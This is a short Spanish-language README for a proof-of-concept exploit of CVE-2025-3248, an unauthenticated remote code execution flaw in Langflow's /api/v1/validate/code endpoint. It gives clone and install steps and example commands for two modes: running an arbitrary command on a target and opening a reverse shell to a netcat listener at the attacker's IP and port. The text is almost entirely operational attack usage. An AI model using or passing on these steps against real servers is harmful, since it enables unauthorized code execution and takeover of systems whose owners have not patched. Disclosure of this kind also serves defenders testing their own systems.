
PoC para CVE-2025-3248: RCE no autenticado en Langflow < 1.3.0 a través de /api/v1/validate/code.
Un exploit de prueba de concepto que demuestra una vulnerabilidad de ejecución remota de código en el endpoint de validación de código de Langflow. Esta vulnerabilidad afecta a las versiones de Langflow anteriores a la 1.3.0, permitiendo a atacantes no autenticados ejecutar código arbitrario mediante solicitudes HTTP manipuladas.
/api/v1/validate/coderequestscoloramagit clone https://github.com/preemware/langflow-exploit
cd langflow-exploit
pip install requests colorama
El exploit admite dos modos de funcionamiento:
Ejecuta un único comando en el sistema objetivo:
python3 cve-2025-3248.py cmd <target_url> "<command>"
Ejemplo:
python3 cve-2025-3248.py cmd http://target:7860 "id"
Genera una shell inversa interactiva:
nc -lvnp 4444
python3 cve-2025-3248.py shell <target_url> <your_ip> <your_port>
Ejemplo:
python3 cve-2025-3248.py shell http://target:7860 10.0.0.5 4444